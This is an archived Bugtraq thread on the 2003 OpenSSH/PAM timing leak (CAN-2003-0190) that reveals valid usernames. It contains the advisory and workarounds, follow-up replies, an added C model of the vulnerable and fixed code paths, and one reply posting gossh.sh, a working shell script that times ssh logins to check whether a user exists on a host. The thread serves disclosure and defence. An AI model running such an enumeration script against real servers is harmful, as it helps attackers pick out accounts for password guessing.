100095 2003-04-30 20:22 /11 lines/ Marco Ivaldi <raptor@mediaservice.net>
Imported: 2003-04-30 20:22 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4704>
Subject: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
Hi all,

See attached advisory.

--
Marco Ivaldi
Chief Security Officer
Data Security Division
@ Mediaservice.net Srl
http://mediaservice.net/
(100095) /Marco Ivaldi <raptor@mediaservice.net>/---
Attachment (text/plain) in text 100096
Comment in text 100127 by Ethan Benson <erbenson@alaska.net>

100096 2003-04-30 20:22 /128 lines/ Marco Ivaldi <raptor@mediaservice.net>
Attachment filename: "2003-01-openssh.txt"
Imported: 2003-04-30 20:22 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4705>
Attachment (text/plain) to text 100095
Subject: Attachment (2003-01-openssh.txt) to: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
Security Advisory                                    @ Mediaservice.net Srl
(#01, 30/04/2003)                                     Data Security Division

Title:          OpenSSH/PAM timing attack allows remote users identification
Application:    OpenSSH-portable <= 3.6.1p1
Platform:       Linux, maybe others
Description:    A remote attacker can identify valid users on vulnerable
                systems, all PAM-enabled systems are potentially affected
Author:         Marco Ivaldi <raptor@mediaservice.net>
Contributors:   Maurizio Agazzini <inode@mediaservice.net>,
                Solar Designer <solar@openwall.com>,
                Andrea Ghirardini <pila@pilasecurity.com>
Vendor Status:  OpenSSH team notified on 12/04/2003,
                vendor-sec list notified on 28/04/2003
CVE Candidate:  The Common Vulnerabilities and Exposures project has assigned
                the name CAN-2003-0190 to this issue.
References:     http://lab.mediaservice.net/advisory/2003-01-openssh.txt
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0190

1. Abstract.
During a pen-test we stumbled across a nasty bug in OpenSSH-portable with PAM
support enabled (via the --with-pam configure script switch). This bug allows a
remote attacker to identify valid users on vulnerable systems, through a simple
timing attack. The vulnerability is easy to exploit and may have high severity,
if combined with poor password policies and other security problems that allow
local privilege escalation.

2. Example Attack Session.

root@voodoo:~# ssh [valid_user]@lab.mediaservice.net
[valid_user]@lab.mediaservice.net's password: <- arbitrary (non-null) string
[2 secs delay]
Permission denied, please try again.

root@voodoo:~# ssh [no_such_user]@lab.mediaservice.net
[no_such_user]@lab.mediaservice.net's password: <- arbitrary (non-null) string
[no delay]
Permission denied, please try again.

3. Affected Platforms.

All vendors supporting Linux-PAM are potentially affected. This includes:

* Debian GNU/Linux        [confirmed in the default install]
* Red Hat Linux           [confirmed in the default install]
* Mandrake Linux          [confirmed in the default install]
* SuSE Linux              [not confirmed in the default install]
* Caldera/SCO Linux       [not confirmed in the default install]
* Apple OS-X              [not confirmed in the default install]
* MSC.Linux               [not confirmed in the default install]

NOTE. FreeBSD uses both a different PAM implementation and a different PAM
support in OpenSSH: it doesn't seem to be vulnerable to this particular timing
leak issue.

All OpenSSH-portable releases <= OpenSSH_3.6.1p1 compiled with PAM support
enabled (./configure --with-pam) are vulnerable to this information leak. The
PAMAuthenticationViaKbdInt directive doesn't need to be enabled in sshd_config.

4. Fix.

There is currently no complete fix to this. Moreover, there are many smaller
timing leaks which too are easy to use to obtain the same information. These
are primarily in OpenSSH and in the system libraries (getpwnam(3), NSS modules,
and so on).
Solving these kinds of timing leaks requires a re-design of the authentication
code paths (partially in the OpenBSD tree and partially only in -portable).

Solar Designer has written an OpenSSH-portable patch for Openwall GNU/*/Linux
(http://www.openwall.com/Owl/) that makes OpenSSH always run PAM with password
authentication, even for non-existent or not allowed usernames, thus fixing the
bigger problem outlined in this advisory. Please note that this patch merely
reduces the timing leaks without fully removing them. Other OpenSSH patches from
the Owl project are available via:

cvs -d :pserver:anoncvs:anoncvs@anoncvs.owl.openwall.com:/cvs co Owl/packages/openssh

The OpenSSH team has released OpenSSH 3.6.1p2, which includes the changes
introduced by Openwall GNU/*/Linux. All OpenSSH-portable users are encouraged
to upgrade.

Our team (with the contribution of Andrea Ghirardini) has been able to find a
valid workaround for the specific timing leak mentioned in this advisory: just
add the "nodelay" option to the pam_unix.so auth configuration. This is a
modified (not vulnerable) configuration for Red Hat Linux (notice the "nodelay"
option on line 2 of /etc/pam.d/system-auth):

[root@redhat pam.d]# pwd
/etc/pam.d
[root@redhat pam.d]# cat sshd
#%PAM-1.0
auth       required     /lib/security/pam_stack.so service=system-auth
auth       required     /lib/security/pam_nologin.so
account    required     /lib/security/pam_stack.so service=system-auth
password   required     /lib/security/pam_stack.so service=system-auth
session    required     /lib/security/pam_stack.so service=system-auth
session    required     /lib/security/pam_limits.so
session    optional     /lib/security/pam_console.so
[root@redhat pam.d]# cat system-auth
#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth        required      /lib/security/pam_env.so
auth        sufficient    /lib/security/pam_unix.so likeauth nullok nodelay
auth        required      /lib/security/pam_deny.so
account     required      /lib/security/pam_unix.so
password    required      /lib/security/pam_cracklib.so retry=3 type=
password    sufficient    /lib/security/pam_unix.so nullok use_authtok md5 shadow
password    required      /lib/security/pam_deny.so
session     required      /lib/security/pam_limits.so
session     required      /lib/security/pam_unix.so

5. Proof Of Concept.

The @ Mediaservice.net D.S.D. (Data Security Division) has developed a working
proof of concept that automatically exploits this information leak issue. The
source code is available for free download at:

http://lab.mediaservice.net/code/ssh_brute.c
http://lab.mediaservice.net/code/openssh-3.6.1p1_brute.diff

Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved.
(100096) /Marco Ivaldi <raptor@mediaservice.net>/(rewrapped)

100159 2003-05-02 01:01 /149 lines/ Nicolas Couture <nc@stormvault.net>
Imported: 2003-05-02 01:01 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4744>
Subject: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
After a bad experience with ssh_brute.c from mediaservice.net, who released,
lately, an advisory for OpenSSH <= 3.6.1p1 that became CAN-2003-0190
(http://lab.mediaservice.net/advisory/2003-01-openssh.txt), I decided to write
my own working exploit:

--- gossh.sh ---
#!/bin/sh
# OpenSSH <= 3.6.p1 - User Identification.
# Nicolas Couture - nc@stormvault.net
#
# Description:
#  -Tells you whether or not a user exists on
#   a distant server running OpenSSH.
#
# Usage:
#  -You NEED to have the host's public key
#   before executing this script.
#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# Fact Sheet:                                   #
#  o It is really accurate against              #
#    redhat boxes.                              #
#  o Linux boxes running grsecurity             #
#    have a 10 second delay on both             #
#    valid AND invalid user login               #
#    attempts.                                  #
#  o *BSD boxes are not vulnerable and          #
#    always have a 10 second delay like         #
#    Linux-Grsec + network protection           #
#                                               #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# History:                                   #
#  Thu May  1 15:41:18 EDT 2003              #
#   ; Script started.                        #
#  Thu May  1 16:42:30 EDT 2003              #
#   ; Script is functional.                  #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#

# Let the user know how we work.
usage(){
	echo "$0 <user> <host>"
	exit 1
}

# Verify the arguments.
[ $# != 2 ] && usage

# Variables.
USER="$1"
HOST="$2"

#=-=-=-=-=-=-=-=-=-=-=-=-=#
# Expect script functions #
#=-=-=-=-=-=-=-=-=-=-=-=-=#

# Expect script for password.
expasswd() {
cat << EOF > expasswd
spawn $SSHCMD
expect password:
send '\r'
interact
EOF
}

# Expect script for error.
experror() {
cat << EOF > experror
spawn expect -f expasswd
expect again.
exit 1593
interact
EOF
}

#=-=-=-=-=-=-=-=-=-=#
# -Fake user timing #
#=-=-=-=-=-=-=-=-=-=#

# OpenSSH client command for a nonexistent user.
export SSHCMD="ssh nicolas_couture@$HOST"

# Build new expect script.
expasswd
experror

# Timing.
FDATE0=`date '+%s'`
echo "[-] Calculating fake user timeout..."
expect -f experror 1> /dev/null 2> /dev/null
FDATE1=`date '+%s'`

# Fake user timeout.
FUTO=`echo $FDATE1 - $FDATE0 | bc`
echo "[+] Found $FUTO."

#=-=-=-=-=-=-=-=#
# -$USER timing #
#=-=-=-=-=-=-=-=#

# OpenSSH command.
export SSHCMD="ssh $USER@$HOST"

# Build new expect scripts.
expasswd
experror

DATE0=`date '+%s'`
echo "[-] Calculating $USER timeout on $HOST..."
expect -f experror 1> /dev/null 2> /dev/null
DATE1=`date '+%s'`

# $USER timeout.
END=`echo $DATE1 - $DATE0 | bc`
echo "[+] Found $END."

#=-=-=-=-=#
# -Result #
#=-=-=-=-=#

if [ "$FUTO" -eq "$END" ] && [ "$FUTO" -eq "10" ]; then
	echo "This box is not vulnerable."
	exit 1
fi

# Use of our magic skills.
if [ "$FUTO" -lt "$END" ]; then
	echo "$USER exists on $HOST."
elif [ "$FUTO" -ge "$END" ]; then
	echo "$USER doesn't exist on $HOST."
else
	echo "Segmentation fault."
	exit 13
fi

# Remove tmp files.
rm -rf expasswd experror

# EOF
--- gossh.sh ---

-Nicolas
(100159) /Nicolas Couture <nc@stormvault.net>/(rewrapped)

100280 2003-05-02 20:14 /7 lines/ ilja van sprundel <ilja@netric.org>
Imported: 2003-05-02 20:14 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4748>
Subject: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
In-Reply-To: <Pine.LNX.4.30L2.0304301358220.9889-200000@dns.mediaservice.net>

hm, this has been known for some time, and stealth of teso wrote a nice paper
and some example tools for stuff like that:
http://www.team-teso.net/releases/epta.tgz
(100280) /ilja van sprundel <ilja@netric.org>/------

100282 2003-05-02 20:58 /41 lines/ Nicolas Couture <nc@stormvault.net>
Imported: 2003-05-02 20:58 by Brevbäraren
External recipient: Ethan Benson <erbenson@alaska.net>
Recipient: Bugtraq (import) <4750>
Comment on text 100127 by Ethan Benson <erbenson@alaska.net>
Subject: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
On Thu, 2003-05-01 at 05:12, Ethan Benson wrote:
> On Wed, Apr 30, 2003 at 04:34:27PM +0200, Marco Ivaldi wrote:
> > root@voodoo:~# ssh [valid_user]@lab.mediaservice.net
> > [valid_user]@lab.mediaservice.net's password: <- arbitrary (non-null) string
> > [2 secs delay]
> > Permission denied, please try again.
> >
> > root@voodoo:~# ssh [no_such_user]@lab.mediaservice.net
> > [no_such_user]@lab.mediaservice.net's password: <- arbitrary (non-null) string
> > [no delay]
> > Permission denied, please try again.
>
> ive noticed something similar in its handling of PermitRootLogin, if
> this option is set to `no' you get the following behavior:

This is not only true in association with the ssh daemon's configuration.
Even if root login is allowed in its configuration but PAM disallows root
logins, it'll result in a 2-second delay on a bad password and reject a good
password instantly instead of logging in. The problem is not in the handling
of PermitRootLogin but in the handling of login in sshd; adding a 2-second
delay before login or removing the 2-second delay on bad login before sending
an error would fix the problem.

> $ ssh root@host
> root@host's password: <- arbitrary (non-null) string
> [2 secs delay]
> Permission denied, please try again.
>
> $ ssh root@host
> root@host's password: <- correct root password
> [no delay]
> Permission denied, please try again.
>
> i haven't checked the current version to see if this is still true.

I verified this on redhat 8, openssh-3.4p1-2 (rpm), and sshd is acting just
like you described it.
(100282) /Nicolas Couture <nc@stormvault.net>/(rewrapped)

100284 2003-05-02 21:12 /22 lines/ Marco Ivaldi <raptor@mediaservice.net>
Imported: 2003-05-02 21:12 by Brevbäraren
External recipient: Michael Shigorin <mike@osdn.org.ua>
Recipient: Bugtraq (import) <4752>
Subject: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
On Fri, 2 May 2003, Michael Shigorin wrote:

> Are you talking of CURRENT branch? 4.x uses linux-PAM as well.

Yeah, I was talking about FreeBSD-current, where OpenPAM has replaced LinuxPAM,
and new PAM modules have been introduced.

Speaking about FreeBSD 4.x, it doesn't seem to be vulnerable to the big timing
leak described in the advisory, even if it doesn't use the "nodelay" option in
/etc/pam.conf. I've not further investigated this behaviour.

I believe, however, that all systems (FreeBSD included) are vulnerable to many
smaller timing leaks, and not only in OpenSSH. But I guess this is a known
problem.
--
Marco Ivaldi
Chief Security Officer
Data Security Division
@ Mediaservice.net Srl
http://mediaservice.net/
(100284) /Marco Ivaldi <raptor@mediaservice.net>/(rewrapped)

100288 2003-05-02 21:44 /47 lines/ Marco Ivaldi <raptor@mediaservice.net>
Imported: 2003-05-02 21:44 by Brevbäraren
External recipient: Thilo Schulz <arny@ats.s.bawue.de>
Recipient: Bugtraq (import) <4756>
Subject: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
On Thu, 1 May 2003, Thilo Schulz wrote:

> This is !!NOT!! a problem specific to openssh.
> When I saw this topic come up I tried the same with proftpd, which also can
> use pam to establish the user's authentication.

I've not investigated this specific issue, but yes, this behaviour may be
common to other daemons supporting PAM authentication. The problem, however,
is not in PAM itself: every daemon should run auth_pam_password() even for
non-existent or non-allowed usernames.

	/* deny if no user. */
	if (pw == NULL)
		return 0;
	if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
		return 0;
	if (*password == '\0' && options.permit_empty_passwd == 0)
		return 0;

	return auth_pam_password(authctxt, password);

As you can see, within OpenSSH < 3.6.1p2 there are a number of cases where
auth_pam_password() wouldn't even be called, and this is easily detectable
remotely. PAM delays just make this remote detection easier.

But this is not a PAM problem at all: I think every daemon should review their
code paths for user authentication, in order to reduce specific timing leaks
(complete resolution of these problems may be a lot harder).

For those who don't know it yet, I suggest an interesting reading: "Execution
path timing analysis of UNIX daemons", by Sebastian Krahmer.
http://stealth.7350.org/epta.tgz

Cheers,

--
Marco Ivaldi
Chief Security Officer
Data Security Division
@ Mediaservice.net Srl
http://mediaservice.net/
(100288) /Marco Ivaldi <raptor@mediaservice.net>/(rewrapped)

100300 2003-05-02 22:37 /33 lines/ Thilo Schulz <arny@ats.s.bawue.de>
Imported: 2003-05-02 22:37 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External recipient: raptor@mediaservice.net
Recipient: Bugtraq (import) <4761>
Comment on text 100095 by Marco Ivaldi <raptor@mediaservice.net>
Subject: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
On Wednesday, 30th April 2003 16:34 Marco Ivaldi wrote:
> During a pen-test we stumbled across a nasty bug in OpenSSH-portable with
> PAM support enabled (via the --with-pam configure script switch). This bug
> allows a remote attacker to identify valid users on vulnerable systems,
> through a simple timing attack. The vulnerability is easy to exploit and may
> have high severity, if combined with poor password policies and other
> security problems that allow local privilege escalation.

This is !!NOT!! a problem specific to openssh.
When I saw this topic come up I tried the same with proftpd, which also can
use pam to establish the user's authentication.

Here is an example with the simple ftp tool:

thilo@Thilo thilo $ ftp www.someftphost.net
Connected to www.someftphost.net.
220 ProFTPD 1.2.5rc1 Server (Debian) [www.someftphost.net]
Name (www.someftphost.net:thilo): thilo
331 Password required for thilo.
Password: [valid user account, but wrong password: 2 seconds wait]
530 Login incorrect.
Login failed.
ftp>

Same here: if this is an invalid user, there is no delay between the entering
of the password and the 530 reply.
I tested the postfix SMTP daemon, apache and the ipopd POP3 daemon, which have
PAM support; there this weakness is obviously not present. Yet don't consider
all daemons secure: there may still be many others out there that suffer from
the same weakness.

- Thilo Schulz
(100300) /Thilo Schulz <arny@ats.s.bawue.de>/(rewrapped)

100301 2003-05-02 22:42 /11 lines/ Michael Shigorin <mike@osdn.org.ua>
Imported: 2003-05-02 22:42 by Brevbäraren
External recipient: Marco Ivaldi <raptor@mediaservice.net>
Recipient: Bugtraq (import) <4762>
Comment on text 100095 by Marco Ivaldi <raptor@mediaservice.net>
Subject: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
On Wed, Apr 30, 2003 at 04:34:27PM +0200, Marco Ivaldi wrote:
> NOTE. FreeBSD uses both a different PAM implementation and a
> different PAM support in OpenSSH: it doesn't seem to be
> vulnerable to this particular timing leak issue.

Are you talking of CURRENT branch? 4.x uses linux-PAM as well.
--
---- WBR, Michael Shigorin <mike@altlinux.ru>
------ Linux.Kiev http://www.linux.kiev.ua/
(100301) /Michael Shigorin <mike@osdn.org.ua>/------
Attachment (application/pgp-signature) in text 100302
Comment in text 100284 by Marco Ivaldi <raptor@mediaservice.net>

100302 2003-05-02 22:42 /8 lines/ Michael Shigorin <mike@osdn.org.ua>
Imported: 2003-05-02 22:42 by Brevbäraren
External recipient: Marco Ivaldi <raptor@mediaservice.net>
Recipient: Bugtraq (import) <4763>
Attachment (text/plain) to text 100301
Subject: Attachment to: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
(100302) /Michael Shigorin <mike@osdn.org.ua>/------

100305 2003-05-02 22:55 /76 lines/ Karl-Heinz Haag <k.haag@linux-ag.com>
Imported: 2003-05-02 22:55 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4765>
Comment on text 100095 by Marco Ivaldi <raptor@mediaservice.net>
Subject: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
Quoting Marco Ivaldi (raptor@mediaservice.net):
> Security Advisory                                  @ Mediaservice.net Srl
> (#01, 30/04/2003)                                   Data Security Division
>
> Title:          OpenSSH/PAM timing attack allows remote users identification
> Application:    OpenSSH-portable <= 3.6.1p1
> Platform:       Linux, maybe others
> Description:    A remote attacker can identify valid users on vulnerable
>                 systems, all PAM-enabled systems are potentially affected
> Author:         Marco Ivaldi <raptor@mediaservice.net>
> Contributors:   Maurizio Agazzini <inode@mediaservice.net>,
>                 Solar Designer <solar@openwall.com>,
>                 Andrea Ghirardini <pila@pilasecurity.com>
> Vendor Status:  OpenSSH team notified on 12/04/2003,
>                 vendor-sec list notified on 28/04/2003
> CVE
> Candidate:      The Common Vulnerabilities and Exposures project has assigned
>                 the name CAN-2003-0190 to this issue.
> References:     http://lab.mediaservice.net/advisory/2003-01-openssh.txt
>                 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0190
>
> 1. Abstract.
>
> During a pen-test we stumbled across a nasty bug in OpenSSH-portable with PAM
> support enabled (via the --with-pam configure script switch). This bug allows a
> remote attacker to identify valid users on vulnerable systems, through a simple
> timing attack. The vulnerability is easy to exploit and may have high severity,
> if combined with poor password policies and other security problems that allow
> local privilege escalation.
>
> 2. Example Attack Session.
>
> root@voodoo:~# ssh [valid_user]@lab.mediaservice.net
> [valid_user]@lab.mediaservice.net's password: <- arbitrary (non-null) string
> [2 secs delay]
> Permission denied, please try again.
>
> root@voodoo:~# ssh [no_such_user]@lab.mediaservice.net
> [no_such_user]@lab.mediaservice.net's password: <- arbitrary (non-null) string
> [no delay]
> Permission denied, please try again.
>
> 4. Fix.

The "Fix" is to encourage all users/admins of OpenSSH to _only_ work with key
authentication (preferably only ssh2 protocol) on all ssh servers.

Switch the default:

PasswordAuthentication yes

Into:

PasswordAuthentication no

in sshd_config

In combination with the default "RSAAuthentication yes" it results in:

,--------
| kh@i4x:~$ ssh dodo@i4x    <-dodo=no_such_user
| [no delay]
| Permission denied (publickey).
`--------

The same as:

,--------
| kh@i4x:~$ ssh root@i4x
| [no delay]
| Permission denied (publickey).
`--------

That would be my 2 cents.
Karl-Heinz
(100305) /Karl-Heinz Haag <k.haag@linux-ag.com>/(rewrapped)
Attachment (application/pgp-signature) in text 100306

100306 2003-05-02 22:55 /8 lines/ Karl-Heinz Haag <k.haag@linux-ag.com>
Imported: 2003-05-02 22:55 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4766>
Attachment (text/plain) to text 100305
Subject: Attachment to: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
(100306) /Karl-Heinz Haag <k.haag@linux-ag.com>/----

100391 2003-05-05 17:43 /29 lines/ Marco Ivaldi <raptor@mediaservice.net>
Imported: 2003-05-05 17:43 by Brevbäraren
External recipient: Ethan Benson <erbenson@alaska.net>
Recipient: Bugtraq (import) <4778>
Comment on text 100127 by Ethan Benson <erbenson@alaska.net>
Subject: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
On Thu, 1 May 2003, Ethan Benson wrote:

> ive noticed something similar in its handling of PermitRootLogin, if
> this option is set to `no' you get the following behavior:
>
> $ ssh root@host
> root@host's password: <- arbitrary (non-null) string
> [2 secs delay]
> Permission denied, please try again.
>
> $ ssh root@host
> root@host's password: <- correct root password
> [no delay]
> Permission denied, please try again.
>
> i haven't checked the current version to see if this is still true.

It is, also in the latest OpenSSH_3.6.1p2. I'm not sure if this behaviour has
serious security implications; however, it can be "fixed" by applying the same
workaround suggested for CAN-2003-0190: use the "nodelay" option for
pam_unix.so.
--
Marco Ivaldi
Chief Security Officer
Data Security Division
@ Mediaservice.net Srl
http://mediaservice.net/
(100391) /Marco Ivaldi <raptor@mediaservice.net>/(rewrapped)
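The code path Marco quotes in text 100288 (early returns that skip auth_pam_password() for unknown users, for root under PermitRootLogin=no, and for empty passwords) and the "always run PAM" approach of the Owl patch, modelled side by side in C as an added example that is not code from the advisory, OpenSSH or the Owl patch. The user table, lookup() and pam_password() are constructed stand-ins; auth_before() keeps the quoted early returns, auth_after() runs the PAM step unconditionally and applies the same policy to its result, and pam_ran() reports whether the PAM step (where pam_unix's failure delay lives) executed at all.

```c
/* Added example: models the sshd password path quoted in text 100288.
 * Not OpenSSH, Owl or advisory code; users[], lookup() and
 * pam_password() are constructed stand-ins. */
#include <stddef.h>
#include <string.h>

struct pw_entry { const char *name; unsigned uid; const char *password; };

/* Constructed stand-in for the passwd database consulted via getpwnam(3). */
static const struct pw_entry users[] = {
    { "alice", 1000, "correct horse" },
    { "root",     0, "toor" },
};

static int permit_root_login = 0;  /* sshd_config "PermitRootLogin no" */
static int pam_calls;              /* how often the PAM step ran */

static const struct pw_entry *lookup(const char *name)
{
    size_t i;
    for (i = 0; i < sizeof users / sizeof users[0]; i++)
        if (strcmp(users[i].name, name) == 0)
            return &users[i];
    return NULL;
}

/* Stand-in for auth_pam_password(): this is where pam_unix's failure
 * delay lives, so whether it ran is exactly what a remote client observes. */
static int pam_password(const struct pw_entry *pw, const char *password)
{
    pam_calls++;
    return pw != NULL && strcmp(pw->password, password) == 0;
}

/* Before: the early returns from the quoted snippet.  Unknown users, root
 * under PermitRootLogin=no and empty passwords never reach PAM at all. */
int auth_before(const char *user, const char *password)
{
    const struct pw_entry *pw = lookup(user);
    if (pw == NULL)
        return 0;
    if (pw->uid == 0 && !permit_root_login)
        return 0;
    if (*password == '\0')
        return 0;
    return pam_password(pw, password);
}

/* After (the Owl approach): always run PAM first, then apply the same
 * policy to its result, so every rejection takes the same code path. */
int auth_after(const char *user, const char *password)
{
    const struct pw_entry *pw = lookup(user);
    int ok = pam_password(pw, password);
    if (pw == NULL || *password == '\0')
        ok = 0;
    if (pw != NULL && pw->uid == 0 && !permit_root_login)
        ok = 0;
    return ok;
}

/* Runs one attempt through auth() and returns how many times PAM ran. */
int pam_ran(int (*auth)(const char *, const char *),
            const char *user, const char *password)
{
    pam_calls = 0;
    auth(user, password);
    return pam_calls;
}
```

In the "before" model a nonexistent user or a root login with the correct password is rejected without ever entering PAM, which is the instant "Permission denied" both Marco and Ethan Benson observed; in the "after" model every attempt pays the PAM cost and the outcome is unchanged.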